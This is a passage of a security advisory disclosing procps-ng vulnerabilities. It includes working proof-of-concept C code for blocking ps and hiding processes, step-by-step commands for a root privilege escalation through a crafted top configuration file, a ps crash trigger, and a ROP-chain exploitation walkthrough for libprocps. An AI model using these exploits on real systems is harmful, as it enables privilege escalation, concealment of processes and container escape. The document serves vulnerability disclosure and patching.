and\r\nvulnerabilities in procps-ng; for reference, our patches are available\r\nat:\r\n\r\nhttps://www.qualys.com/2018/05/17/procps-ng-audit-report-patches.tar.gz\r\n\r\nand base64-encoded at the end of this advisory. In the remainder of this\r\nadvisory, we present our most interesting findings:\r\n\r\n1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)\r\n\r\n An attacker can block any read() access to /proc/PID/cmdline by\r\n mmap()ing a FUSE file (Filesystem in Userspace) onto this process's\r\n command-line arguments. The attacker can therefore block pgrep, pidof,\r\n pkill, ps, and w, either forever (a denial of service), or for some\r\n controlled time (a synchronization tool for exploiting other\r\n vulnerabilities).\r\n\r\n2. Unprivileged process hiding (CVE-2018-1121)\r\n\r\n An unprivileged attacker can hide a process from procps-ng's\r\n utilities, by exploiting either a denial of service (a rather noisy\r\n method) or a race condition inherent in reading /proc/PID entries (a\r\n stealthier method).\r\n\r\n3. Local Privilege Escalation in top (CVE-2018-1122)\r\n\r\n top reads its configuration file from the current working directory,\r\n without any security check, if the HOME environment variable is unset\r\n or empty. In this very unlikely scenario, an attacker can carry out an\r\n LPE (Local Privilege Escalation) if an administrator executes top in\r\n /tmp (for example), by exploiting one of several vulnerabilities in\r\n top's config_file() function.\r\n\r\n4. Denial of Service in ps (CVE-2018-1123)\r\n\r\n An attacker can overflow the output buffer of ps, when executed by\r\n another user, administrator, or script: a denial of service only (not\r\n an LPE), because ps mmap()s its output buffer and mprotect()s its last\r\n page with PROT_NONE (an effective guard page).\r\n\r\n5. Local Privilege Escalation in libprocps (CVE-2018-1124)\r\n\r\n An attacker can exploit an integer overflow in libprocps's\r\n file2strvec() function and carry out an LPE when another user,\r\n administrator, or script executes a vulnerable utility (pgrep, pidof,\r\n pkill, and w are vulnerable by default; other utilities are vulnerable\r\n if executed with non-default options). Moreover, an attacker's process\r\n running inside a container can trigger this vulnerability in a utility\r\n running outside the container: the attacker can exploit this userland\r\n vulnerability and break out of the container or chroot. We will\r\n publish our proof-of-concept exploits in the near future.\r\n\r\nAdditionally, CVE-2018-1125 has been assigned to\r\n0008-pgrep-Prevent-a-potential-stack-based-buffer-overflo.patch, and\r\nCVE-2018-1126 to 0035-proc-alloc.-Use-size_t-not-unsigned-int.patch.\r\n\r\n\r\n========================================================================\r\n1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120)\r\n========================================================================\r\n\r\nIn this experiment, we add a sleep(60) to hello_read() in\r\nhttps://github.com/libfuse/libfuse/blob/master/example/hello.c and\r\ncompile it, mount it on /tmp/fuse, and mmap() /tmp/fuse/hello onto the\r\ncommand-line arguments of a simple proof-of-concept:\r\n\r\n$ gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello\r\n$ mkdir /tmp/fuse\r\n$ ./hello /tmp/fuse\r\n\r\n$ cat > fuse-backed-cmdline.c << \"EOF\"\r\n#include <fcntl.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/mman.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\n\r\n#define die() do { \\\r\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\r\n exit(EXIT_FAILURE); \\\r\n} while (0)\r\n\r\n#define PAGESZ ((size_t)4096)\r\n\r\nint\r\nmain(const int argc, const char * const argv[])\r\n{\r\n if (argc <= 0) die();\r\n const char * const arg_start = argv[0];\r\n const char * const last_arg = argv[argc-1];\r\n const char * const arg_end = last_arg + strlen(last_arg) + 1;\r\n\r\n if (arg_end <= arg_start) die();\r\n const size_t len = arg_end - arg_start;\r\n if (len < 2 * PAGESZ) die();\r\n\r\n char * const addr = (char *)(((size_t)arg_start + PAGESZ-1) & ~(PAGESZ-1));\r\n if (addr < arg_start) die();\r\n if (addr + PAGESZ > arg_end) die();\r\n\r\n const int fd = open(\"/tmp/fuse/hello\", O_RDONLY);\r\n if (fd <= -1) die();\r\n if (mmap(addr, PAGESZ, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0) != addr) die();\r\n if (close(fd)) die();\r\n\r\n for (; {\r\n sleep(1);\r\n }\r\n die();\r\n}\r\nEOF\r\n$ gcc -Wall fuse-backed-cmdline.c -o fuse-backed-cmdline\r\n$ ./fuse-backed-cmdline `perl -e 'print \"A\" x 8192'`\r\n\r\nThen, if root executes ps (for example):\r\n\r\n# time ps ax\r\n PID TTY STAT TIME COMMAND\r\n...\r\nreal 1m0.021s\r\nuser 0m0.003s\r\nsys 0m0.017s\r\n\r\n\r\n========================================================================\r\n2. Unprivileged process hiding (CVE-2018-1121)\r\n========================================================================\r\n\r\nSeveral procps-ng utilities (pgrep, pidof, pkill, ps, w) read the\r\n/proc/PID/cmdline of every process running on the system; hence, an\r\nunprivileged attacker can hide a process (albeit noisily) by exploiting\r\na denial of service in procps-ng (for example, the FUSE-backed denial of\r\nservice, or one of the integer overflows in file2strvec()).\r\n\r\nAlternatively, we devised a stealthier method for hiding a process:\r\n\r\n1/ fork() our process until it occupies the last PID\r\n(/proc/sys/kernel/pid_max - 1) or one of the last PIDs;\r\n\r\n2/ monitor (with inotify) the /proc directory and the /proc/PID/stat\r\nfile of one of the very first PIDs, for IN_OPEN events (opendir() and\r\nopen());\r\n\r\n3/ when these events occur (when a procps-ng utility starts scanning\r\n/proc for /proc/PID entries), fork() our process until its PID wraps\r\naround and occupies one of the very first PIDs;\r\n\r\n4/ monitor (with inotify) the /proc directory for an IN_CLOSE_NOWRITE\r\nevent (closedir());\r\n\r\n5/ when this event occurs (when the procps-ng utility stops scanning\r\n/proc), go back to 1/.\r\n\r\nThis simple method works, because the kernel's proc_pid_readdir()\r\nfunction returns the /proc/PID entries in ascending numerical order.\r\nMoreover, this race condition can be made deterministic by using a\r\nFUSE-backed /proc/PID/cmdline as a synchronization tool.\r\n\r\n$ cat > unprivileged-process-hiding.c << \"EOF\"\r\n#include <errno.h>\r\n#include <limits.h>\r\n#include <signal.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/inotify.h>\r\n#include <sys/stat.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <unistd.h>\r\n\r\n#define die() do { \\\r\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\r\n exit(EXIT_FAILURE); \\\r\n} while (0)\r\n\r\nint\r\nmain(void)\r\n{\r\n for (; {\r\n char lost[64];\r\n {\r\n const pid_t hi = getpid();\r\n pid_t lo = fork();\r\n if (lo <= -1) die();\r\n if (!lo) { /* child */\r\n lo = getpid();\r\n if (lo < hi) exit(EXIT_SUCCESS); /* parent continues */\r\n for (; {\r\n if (kill(hi, 0) != -1) continue;\r\n if (errno != ESRCH) die();\r\n break;\r\n }\r\n continue;\r\n }\r\n /* parent */\r\n if (lo > hi) exit(EXIT_FAILURE); /* child continues */\r\n int status = 0;\r\n if (waitpid(lo, &status, 0) != lo) die();\r\n if (!WIFEXITED(status)) die();\r\n if (WEXITSTATUS(status) != EXIT_SUCCESS) die();\r\n\r\n printf(\"%d -> %d -> \", hi, lo);\r\n for (; {\r\n struct stat st;\r\n if (--lo <= 0) die();\r\n snprintf(lost, sizeof(lost), \"/proc/%d/stat\", lo);\r\n if (stat(lost, &st) == 0) break;\r\n }\r\n printf(\"%d\\n\", lo);\r\n }\r\n\r\n const int pofd = inotify_init();\r\n if (pofd <= -1) die();\r\n if (inotify_add_watch(pofd, \"/proc\", IN_OPEN) <= -1) die();\r\n\r\n const int lofd = inotify_init();\r\n if (lofd <= -1) die();\r\n if (inotify_add_watch(lofd, lost, IN_OPEN) <= -1) die();\r\n\r\n const int pcfd = inotify_init();\r\n if (pcfd <= -1) die();\r\n if (inotify_add_watch(pcfd, \"/proc\", IN_CLOSE_NOWRITE) <= -1) die();\r\n\r\n char buf[sizeof(struct inotify_event) + NAME_MAX + 1];\r\n const struct inotify_event * const evp = (void *)buf;\r\n\r\n for (; {\r\n if (read(pofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();\r\n if (evp->mask & IN_ISDIR) break;\r\n }\r\n\r\n if (read(lofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();\r\n for (; {\r\n const pid_t hi = getpid();\r\n pid_t lo = fork();\r\n if (lo <= -1) die();\r\n if (lo) exit(EXIT_SUCCESS); /* parent */\r\n /* child */\r\n lo = getpid();\r\n if (lo < hi) {\r\n printf(\"%d -> %d\\n\", hi, lo);\r\n break;\r\n }\r\n }\r\n\r\n for (; {\r\n if (read(pcfd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die();\r\n if (evp->mask & IN_ISDIR) break;\r\n }\r\n\r\n if (close(pofd)) die();\r\n if (close(lofd)) die();\r\n if (close(pcfd)) die();\r\n }\r\n die();\r\n}\r\nEOF\r\n$ gcc -Wall unprivileged-process-hiding.c -o unprivileged-process-hiding\r\n$ ./unprivileged-process-hiding\r\n\r\nThen, if root executes ps (for example):\r\n\r\n# ps ax | grep '[u]nprivileged-process-hiding' | wc\r\n 0 0 0\r\n\r\n\r\n========================================================================\r\n3. Local Privilege Escalation in top (CVE-2018-1122)\r\n========================================================================\r\n\r\nIf a/ an administrator executes top in a directory writable by an\r\nattacker and b/ the HOME environment variable is unset or empty, then\r\ntop reads its configuration file from the current working directory,\r\nwithout any security check:\r\n\r\n3829 static void configs_read (void) {\r\n....\r\n3847 p_home = getenv(\"HOME\");\r\n3848 if (!p_home || p_home[0] == '\\0')\r\n3849 p_home = \".\";\r\n3850 snprintf(Rc_name, sizeof(Rc_name), \"%s/.%src\", p_home, Myname);\r\n3851 \r\n3852 if (!(fp = fopen(Rc_name, \"r\"))) {\r\n....\r\n3865 if (fp) {\r\n3866 p = config_file(fp, Rc_name, &tmp_delay);\r\n\r\nAlthough b/ is very unlikely, we developed a simple command-line method\r\nfor exploiting one of the vulnerabilities in config_file(), when top is\r\nnot a PIE (Position-Independent Executable). For example, on Ubuntu\r\n16.04.4:\r\n\r\n$ file /usr/bin/top\r\n/usr/bin/top: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e64fe2c89ff07ca4ce5d169078586d2854628a29, stripped\r\n\r\nFirst, we dump a clean configuration file to /tmp/.toprc, by running top\r\nand pressing the 'W' key:\r\n\r\n$ cd /tmp\r\n$ env -u HOME top\r\nW\r\nq\r\n\r\nSecond, we add an arbitrary \"inspect\" command to this configuration file\r\n(inspect commands are normally executed when the user presses the 'Y'\r\nkey):\r\n\r\n$ echo -e 'pipe\\tname\\tid>>/tmp/top.%d.%lx' >> .toprc\r\n\r\nTo execute our inspect command without user interaction, we will emulate\r\nthe 'Y' key by jumping directly into inspection_utility(), at 0x40a989\r\n(the fflush(stdout) is INSP_BUSY's last instruction):\r\n\r\n3442 static void inspection_utility (int pid) {\r\n....\r\n3496 case kbd_ENTER:\r\n3497 INSP_BUSY;\r\n3498 Insp_sel = &Inspect.tab[sel];\r\n3499 Inspect.tab[sel].func(Inspect.tab[sel].fmts, pid);\r\n\r\n 40a97d: 48 8b 3d 1c f8 20 00 mov 0x20f81c(%rip),%rdi # 61a1a0 <stdout>\r\n 40a984: e8 67 7f ff ff callq 4028f0 <fflush@plt>\r\n 40a989: 48 63 05 2c f9 20 00 movslq 0x20f92c(%rip),%rax # 61a2bc\r\n 40a990: 8b 74 24 74 mov 0x74(%rsp),%esi\r\n 40a994: 48 c1 e0 06 shl $0x6,%rax\r\n 40a998: 48 03 05 61 11 23 00 add 0x231161(%rip),%rax # 63bb00\r\n 40a99f: 48 89 05 12 11 23 00 mov %rax,0x231112(%rip) # 63bab8\r\n 40a9a6: 48 8b 78 18 mov 0x18(%rax),%rdi\r\n 40a9aa: ff 10 callq *(%rax)\r\n 40a9ac: 5b pop %rbx\r\n\r\nTo jump directly into inspection_utility(), we will take control of\r\ntop's execution flow, by exploiting a vulnerability in config_file().\r\n\"sortindx\" is read from the configuration file without any sanity check,\r\nand is later used by window_show() to access a struct FLD_t which\r\ncontains a function pointer \"sort\":\r\n\r\n5876 static int window_show (WIN_t *q, int wmax) {\r\n....\r\n5894 qsort(q->ppt, Frame_maxtask, sizeof(proc_t*), Fieldstab[q->rc.sortindx].sort);\r\n\r\n 40de01: ba 08 00 00 00 mov $0x8,%edx\r\n 40de06: 48 c1 e0 05 shl $0x5,%rax\r\n 40de0a: 48 8b 88 30 99 61 00 mov 0x619930(%rax),%rcx\r\n 40de11: e8 7a 47 ff ff callq 402590 <qsort@plt>\r\n\r\nTo take control of this function pointer, we will write 0x40a989's LSW\r\n(Least Significant Word, 32 bits) into \"graph_mems\" and 0x40a989's MSW\r\n(Most Significant Word, 32 bits) into \"summclr\", which are read from the\r\nconfiguration file and written to 0x63ed30 (and 0x63ed34), a memory\r\nlocation accessible by 0x619930+(sortindx<<0x5):\r\n\r\n3676 static const char *config_file (FILE *fp, const char *name, float *delay) {\r\n....\r\n3710 if (3 > fscanf(fp, \"\\twinflags=%d, sortindx=%d, maxtasks=%d, graph_cpus=%d, graph_mems=%d\\n\"\r\n3711 , &w->rc.winflags, &w->rc.sortindx, &w->rc.maxtasks, &w->rc.graph_cpus, &w->rc.graph_mems))\r\n3712 return p;\r\n3713 if (4 != fscanf(fp, \"\\tsummclr=%d, msgsclr=%d, headclr=%d, taskclr=%d\\n\"\r\n3714 , &w->rc.summclr, &w->rc.msgsclr\r\n3715 , &w->rc.headclr, &w->rc.taskclr))\r\n3716 return p;\r\n\r\n 406f90: 4d 8d b5 30 ed 63 00 lea 0x63ed30(%r13),%r14\r\n .......\r\n 406fa9: 41 56 push %r14\r\n .......\r\n 406fb3: e8 d8 b7 ff ff callq 402790 <fscanf@plt>\r\n .......\r\n 406fca: 49 8d 95 34 ed 63 00 lea 0x63ed34(%r13),%rdx\r\n .......\r\n 406fe5: e8 a6 b7 ff ff callq 402790 <fscanf@plt>\r\n\r\nNext, we modify the configuration file's \"graph_mems\", \"summclr\", and\r\n\"sortindx\" accordingly:\r\n\r\n$ sed -i s/'graph_mems=[0-9]*'/graph_mems=$((0x40a989))/ .toprc\r\n\r\n$ sed -i s/'summclr=[0-9]*'/summclr=0/ .toprc\r\n\r\n$ sed -i s/'sortindx=[0-9]*'/sortindx=$(((0x63ed30-0x619930)>>0x5))/ .toprc\r\n\r\nLast, we turn off the View_MEMORY bit in the configuration file's\r\n\"winflags\", to prevent summary_show() from crashing because of our\r\nout-of-bounds \"graph_mems\":\r\n\r\n314 #define View_MEMORY 0x001000 // 'm' - display memory summary\r\n\r\n5418 static void summary_show (void) {\r\n....\r\n5499 if (isROOM(View_MEMORY, 2)) {\r\n....\r\n5540 if (w->rc.graph_mems) {\r\n....\r\n5559 ix = w->rc.graph_mems - 1;\r\n....\r\n5572 snprintf(util, sizeof(util), gtab[ix].swap, (int)((pct_swap * Graph_adj) + .5), gtab[ix].type);\r\n\r\n$ winflags=`grep -m 1 winflags= .toprc | sed s/'.*winflags=\\([0-9]*\\).*'/'\\1'/`\r\n$ sed -i s/'winflags=[0-9]*'/winflags=$((winflags&~0x001000))/ .toprc\r\n\r\nThen, if an administrator executes top in /tmp, without a HOME\r\nenvironment variable (or with an empty HOME environment variable):\r\n\r\n# cat /tmp/top.*\r\ncat: '/tmp/top.*': No such file or directory\r\n\r\n# cd /tmp\r\n# env -u HOME top\r\n...\r\n signal 11 (SEGV) was caught by top, please\r\n see http://www.debian.org/Bugs/Reporting\r\nSegmentation fault (core dumped)\r\n\r\n# cat /tmp/top.*\r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n\r\n========================================================================\r\n4. Denial of Service in ps (CVE-2018-1123)\r\n========================================================================\r\n\r\nps's functions pr_args(), pr_comm(), and pr_fname() are vulnerable to an\r\nmmap-based buffer overflow of outbuf (ps's output buffer):\r\n\r\n 401 static int pr_args(char *restrict const outbuf, const proc_t *restrict const pp){\r\n 402 char *endp = outbuf;\r\n 403 int rightward = max_rightward;\r\n 404 int fh = forest_helper(outbuf);\r\n 405 \r\n 406 endp += fh;\r\n 407 rightward -= fh;\r\n 408 \r\n 409 if(pp->cmdline && !bsd_c_option)\r\n 410 endp += escaped_copy(endp, *pp->cmdline, OUTBUF_SIZE, &rightward);\r\n 411 else\r\n 412 endp += escape_command(endp, pp, OUTBUF_SIZE, &rightward, ESC_DEFUNCT);\r\n 413 \r\n 414 if(bsd_e_option && rightward>1) {\r\n 415 if(pp->environ && *pp->environ) {\r\n 416 *endp++ = ' ';\r\n 417 rightward--;\r\n 418 endp += escape_strlist(endp, pp->environ, OUTBUF_SIZE, &rightward);\r\n 419 }\r\n 420 }\r\n 421 return max_rightward-rightward;\r\n 422 }\r\n\r\nThe number of bytes written to endp by the escape*() functions is added\r\nto endp (a pointer into outbuf), but never subtracted from OUTBUF_SIZE.\r\nNormally \"rightward\" prevents this buffer overflow, because the maximum\r\nnumber of \"cells\" written to outbuf is OUTBUF_SIZE, and is equal to the\r\nnumber of \"bytes\" written to outbuf; but not in escape_str_utf8():\r\n\r\n 36 static int escape_str_utf8(char *restrict dst, const char *restrict src, int bufsize, int *maxcells){\r\n ..\r\n 50 if (!(len = mbrtowc (&wc, src, MB_CUR_MAX, &s)))\r\n ..\r\n 78 int wlen = wcwidth(wc);\r\n ..\r\n100 memcpy(dst, src, len);\r\n101 my_cells += wlen;\r\n102 dst += len;\r\n103 my_bytes += len;\r\n104 src += len;\r\n\r\nFor example, in the \"en_US.UTF-8\" locale, the multibyte sequence\r\n\"\\xf4\\x81\\x8e\\xb6\" consumes 4 bytes, but only 1 cell, and an easy\r\ntrigger for one of the outbuf overflows is:\r\n\r\n$ (A=`python -c 'print \"\\xf4\\x81\\x8e\\xb6\" * 32767'` exec -a `python -c 'print \"A\" * 65535'` sleep 60) &\r\n[1] 2670\r\n\r\n# env LANG=en_US.UTF-8 ps awwe\r\n PID TTY STAT TIME COMMAND\r\n...\r\nSignal 11 (SEGV) caught by ps (procps-ng version 3.3.10).\r\n 2670 pts/0 S 0:00ps:display.c:66: please report this bug\r\nSegmentation fault\r\n\r\nThis buffer overflow is a denial of service only (not an LPE), because\r\nps mmap()s outbuf and mprotect()s its last page with PROT_NONE (an\r\neffective guard page):\r\n\r\n2147 void init_output(void){\r\n....\r\n2164 outbuf = mmap(\r\n2165 0,\r\n2166 page_size * (outbuf_pages+1), // 1 more, for guard page at high addresses\r\n2167 PROT_READ | PROT_WRITE,\r\n2168 MAP_PRIVATE | MAP_ANONYMOUS,\r\n2169 -1,\r\n2170 0\r\n2171 );\r\n....\r\n2174 mprotect(outbuf + page_size*outbuf_pages, page_size, PROT_NONE); // guard page\r\n\r\n\r\n========================================================================\r\n5. Local Privilege Escalation in libprocps (CVE-2018-1124)\r\n========================================================================\r\n\r\n========================================================================\r\n5.1. Vulnerability\r\n========================================================================\r\n\r\nlibprocps's file2strvec() function parses a process's /proc/PID/cmdline\r\n(or /proc/PID/environ), and creates an in-memory copy of this process's\r\nargv[] (command-line argument strings, and pointers to these strings).\r\nfile2strvec() is called when either PROC_FILLCOM or PROC_FILLARG, but\r\nnot PROC_EDITCMDLCVT, is passed to openproc() or readproctab() (or\r\nPROC_FILLENV but not PROC_EDITENVRCVT).\r\n\r\nfile2strvec() is vulnerable to three integer overflows (of \"tot\", \"c\",\r\nand \"tot + c + align\"):\r\n\r\n 660 static char** file2strvec(const char* directory, const char* what) {\r\n 661 char buf[2048]; /* read buf bytes at a time */\r\n 662 char *p, *rbuf = 0, *endbuf, **q, **ret;\r\n 663 int fd, tot = 0, n, c, end_of_file = 0;\r\n 664 int align;\r\n ...\r\n 670 /* read whole file into a memory buffer, allocating as we go */\r\n 671 while ((n = read(fd, buf, sizeof buf - 1)) >= 0) {\r\n ...\r\n 686 rbuf = xrealloc(rbuf, tot + n); /* allocate more memory */\r\n 687 memcpy(rbuf + tot, buf, n); /* copy buffer into it */\r\n 688 tot += n; /* increment total byte ctr */\r\n ...\r\n 697 endbuf = rbuf + tot; /* count space for pointers */\r\n 698 align = (sizeof(char*)-1) - ((tot + sizeof(char*)-1) & (sizeof(char*)-1));\r\n 699 for (c = 0, p = rbuf; p < endbuf; p++) {\r\n 700 if (!*p || *p == '\\n')\r\n 701 c += sizeof(char*);\r\n ...\r\n 705 c += sizeof(char*); /* one extra for NULL term */\r\n 706 \r\n 707 rbuf = xrealloc(rbuf, tot + c + align); /* make room for ptrs AT END */\r\n\r\nTo the best of our knowledge, the integer overflows of \"c\" and \"tot + c\r\n+ align\" are not exploitable beyond a denial of service: they result in\r\nan mmap-based buffer overflow of rbuf, but with pointers only (pointers\r\nto our command-line argument strings, and a NULL terminator). Similarly,\r\nwe were unable to exploit the integer overflow of \"tot\" on 32-bit.\r\n\r\nOn 64-bit, however, the integer overflow of \"tot\" results in a memcpy()\r\nof arbitrary bytes (our command-line arguments) to an offset of roughly\r\n-2GB below rbuf. Surprisingly, the \"xrealloc(rbuf, tot + n)\" before the\r\nmemcpy() does not exit() when \"tot\" becomes negative, because xrealloc()\r\nincorrectly uses an \"unsigned int size\" argument instead of a size_t\r\n(CVE-2018-1126):\r\n\r\n 66 void *xrealloc(void *oldp, unsigned int size) {\r\n\r\n========================================================================\r\n5.2. Exploitation\r\n========================================================================\r\n\r\nTo exploit the integer overflow of \"tot\" on 64-bit, we are faced with\r\nseveral difficulties:\r\n\r\n- We must defeat NX, ASLR, PIE, full RELRO, SSP (Stack-Smashing\r\n Protector), and FORTIFY.\r\n\r\n- Our exploit must be one-shot, or as close to one-shot as possible: we\r\n may use brute-force if the target procps-ng utility is executed by a\r\n script, but we have only one chance to exploit this vulnerability if\r\n the target utility is executed manually by an administrator.\r\n\r\n- We have no control over the target utility's command-line arguments,\r\n environment variables, or resource limits (it is executed by another\r\n user, administrator, or script), and we have no direct channel for an\r\n information leak (we have no access to the target utility's output,\r\n for example).\r\n\r\n- We were unable to exploit the integer overflow of \"tot\" when rbuf is\r\n mmap()ed (but we were also unable to prove that it is unexploitable);\r\n when the integer \"tot\" overflows, rbuf is an mmap()ed chunk (its size\r\n is roughly 2GB), and because Linux's mmap() is a top-down allocator,\r\n we believe that:\r\n\r\n . rbuf must be allocated in a hole of the mmap-space (to survive the\r\n memcpy() at a negative offset below rbuf);\r\n\r\n . it is impossible to make such a large hole (in procps-ng, calls to\r\n the malloc functions are extremely rare).\r\n\r\nDespite these difficulties, we developed proof-of-concept exploits\r\nagainst the procps-ng utility \"w\" on Ubuntu 16.04 (a one-shot exploit\r\nagainst a partial RELRO, non-PIE w), Debian 9 and Fedora 27 (a nearly\r\none-shot exploit against a full RELRO, PIE w): if we first force \"w\" to\r\nmalloc()ate n_mmaps_max = 64K mmap()ed chunks (whose size is larger than\r\nmmap_threshold = 128KB), then malloc() will not call mmap() anymore, but\r\nwill call brk() instead, even for chunks larger than mmap_threshold. The\r\n2GB rbuf (after the integer overflow of tot) will therefore be allocated\r\non the heap by brk(), and because brk() is a bottom-up allocator, we can\r\neasily arrange for the memcpy() at rbuf - 2GB to overwrite the beginning\r\nof the heap:\r\n\r\n- if w is not a PIE, we overwrite libprocps's internal PROCTAB structure\r\n and its function pointers;\r\n\r\n- if w is a PIE, we overwrite the glibc's internal *gettext() structures\r\n and transform this memory corruption into a format-string exploit.\r\n\r\nTo force 64K allocations of 128KB (8GB) in w, we need 64K distinct PIDs\r\n(each /proc/PID/cmdline allocates 128KB in file2strvec()): consequently,\r\n/proc/sys/kernel/pid_max must be greater than 64K (it is 32K by default,\r\neven on 64-bit). This is not an unusual setting: large servers (database\r\nservers, container and storage platforms) commonly increase the value of\r\npid_max (up to 4M on 64-bit). Besides pid_max, other settings may limit\r\nour ability to spawn 64K processes: /proc/sys/kernel/threads-max,\r\nRLIMIT_NPROC, and systemd-logind's UserTasksMax. Unlike pid_max,\r\nhowever, these limits are not insuperable obstacles:\r\n\r\n- they may be naturally greater than 64K, depending on the total number\r\n of RAM pages (for /proc/sys/kernel/threads-max and RLIMIT_NPROC) or\r\n the value of pid_max (for UserTasksMax);\r\n\r\n- they may not apply to the attacker's user account (for example,\r\n systemd-logind may not at all manage this specific user account);\r\n\r\n- in any case, we do not need to spawn 64K concurrent processes: if we\r\n use /proc/PID/cmdline as a FUSE-backed synchronization tool, we need\r\n only a few concurrent processes.\r\n\r\n========================================================================\r\n5.3. Exploitation details\r\n========================================================================\r\n\r\nOur proof-of-concept exploit spawns five different types of processes\r\n(\"main\", \"mmap\", \"dist\", \"wrap\", and \"srpt\"):\r\n\r\n- a long-lived \"main\" process, which spawns and coordinates the other\r\n processes;\r\n\r\n- 64K long-lived \"mmap\" processes, which guarantee that the ~2GB rbufs\r\n of our \"dist\" and \"wrap\" processes are allocated by brk() in the heap\r\n of our future \"w\" target; the \"mmap\" processes occupy the lowest PIDs\r\n available, to avoid interference from other processes with the heap\r\n layout of w;\r\n\r\n- a long-lived \"dist\" (\"distance\") process, whose /proc/PID/cmdline is\r\n carefully constructed to cover the exact distance between our target\r\n structure (at the beginning of w's heap) and the rbuf of our \"wrap\"\r\n process (at the end of w's heap);\r\n\r\n- a long-lived \"wrap\" (\"integer wrap\") process, which overflows the\r\n integer \"tot\" and overwrites our target structure at the beginning of\r\n w's heap (with the memcpy() at rbuf - 2GB);\r\n\r\n- short-lived \"srpt\" (\"simulate readproctab\") processes, which measure\r\n the exact distance between our target structure (at the beginning of\r\n w's heap) and the rbuf of our \"wrap\" process (at the end of w's heap);\r\n because this distance depends on an accurate list of processes running\r\n on the system, our exploit regularly spawns \"srpt\" processes until the\r\n distance stabilizes (it is particularly unstable after a reboot).\r\n\r\nWe use a few noteworthy tricks in this exploit:\r\n\r\n- we do not fork() but clone() the \"mmap\" processes (we use the flags\r\n CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SYSVSEM | CLONE_SIGHAND, but\r\n not CLONE_THREAD, because each process must have its own /proc/PID\r\n entry): this is much faster, and significantly reduces the memory\r\n consumption of our exploit (the target \"w\" process itself already\r\n consumes over 12GB = 64K*128KB + 2GB + 2GB -- the rbufs for the\r\n \"mmap\", \"dist\", and \"wrap\" processes);\r\n\r\n- we analyze the ~2GB command-line argument strings of our \"dist\" and\r\n \"wrap\" processes, to detect repeated patterns and replace them with\r\n our equivalent file-backed mmap()s (this further reduces the memory\r\n consumption of the exploit); moreover, we replace the argv[] pointers\r\n of these processes with PROT_NONE mmap()s (hundreds of megabytes that\r\n are never accessed);\r\n\r\n- we initially simulated readproctab() with our own exploit code, but\r\n eventually switched to a small LD_PRELOAD library that instruments the\r\n real \"w\" utility and provides more accurate measurements.\r\n\r\nThere is much room for improvement in this proof-of-concept exploit: for\r\nexample, it depends on the exact distance between our target structure\r\n(at the beginning of w's heap) and the rbuf of our \"wrap\" process (at\r\nthe end of w's heap), but this distance is hard to measure inside a\r\ncontainer, because processes running outside the container are not\r\nvisible inside the container (brute-force may be a solution if the\r\ntarget utility is executed by a script, but not if it is executed\r\nmanually by an administrator; better solutions may exist).\r\n\r\n========================================================================\r\n5.4. Non-PIE exploitation\r\n========================================================================\r\n\r\nIn this section, we describe our simplest proof-of-concept exploit,\r\nagainst the non-PIE \"w\" on Ubuntu 16.04: we overflow the integer \"tot\"\r\nin file2strvec(), we overwrite the PROCTAB structure and its function\r\npointers, and we jump into the executable segment of w. However, w is\r\nvery small and contains no useful gadgets, syscall instructions, or\r\nlibrary calls. Instead, we use a technique pioneered by Nergal in\r\nhttp://phrack.org/issues/58/4.html (\"5 - The dynamic linker's\r\ndl-resolve() function\"):\r\n\r\nWe jump to the very beginning of w's PLT (Procedure Linkage Table),\r\nwhich calls _dl_runtime_resolve() and _dl_fixup() with a \"reloc_arg\"\r\nthat we control (it is read from the stack) and that indexes our own\r\nfake Elf64_Rela structure (in w's heap), which in turn indexes a fake\r\nElf64_Sym structure, which in turn indexes a string that we control and\r\nthat allows us to call any library function, by name (even if it does\r\nnot appear in w's PLT). The obvious choice here is the \"system\"\r\nfunction:\r\n\r\n- the RDI register (the first argument of the function pointer that we\r\n overwrote, and hence the command argument of system()) points to the\r\n PROCTAB structure, whose contents we control;\r\n\r\n- we do not need to worry about the privilege dropping of /bin/sh,\r\n because w is not a set-user-ID executable.\r\n\r\nFinally, we must solve two practical problems to use this dynamic-linker\r\ntechnique against w:\r\n\r\n- our fake ELF structures are located in the heap, but indexed from the\r\n executable, and a random gap separates the heap from the executable:\r\n we therefore allocate four large areas in the heap (large enough to\r\n defeat the randomization of the heap), one for each of our fake\r\n structures (Elf64_Rela, Elf64_Sym, \"system\", and ndx for symbol\r\n versioning);\r\n\r\n- malloc guarantees a 16-byte alignment, but Elf64_Rela and Elf64_Sym\r\n are 24-byte structures: luckily, the last 8 bytes of these structures\r\n are unused, and we therefore truncate our fake structures to 16 bytes.\r\n\r\nFor example, on Ubuntu 16.04.4, we overwrite the PROCTAB structure with\r\nthe following ROP chain:\r\n\r\n procfs taskdir tdu df finder reader tfinder\r\n|--------|--------|----+---|--------|--------|--------|------|--------|--------|\r\n| id>>/tmp/w.$$ |000|0x4020bb|0x4029db|0x401100| .... |relocarg|0x402a50|\r\n|--------|--------|----+---|--------|--------|--------|------|--------|--------|\r\n 0xffb8 bytes\r\n\r\n- the first gadget that we execute, 0x4020bb, pivots the stack pointer\r\n to RDI (which points to the very beginning of the PROCTAB structure):\r\n \"push rdi; ...; pop rsp; pop r13; pop r14; pop r15; pop rbp; ret;\"\r\n\r\n- the second gadget that we execute, 0x4029db, increases the stack\r\n pointer by 0xffb8 bytes (it would otherwise crash into the beginning\r\n of the heap, because the stack grows down): \"ret 0xffb8;\"\r\n\r\n- the third gadget that we execute, 0x401100, calls\r\n _dl_runtime_resolve() and _dl_fixup() with our own \"relocarg\" (this\r\n effectively calls system() with 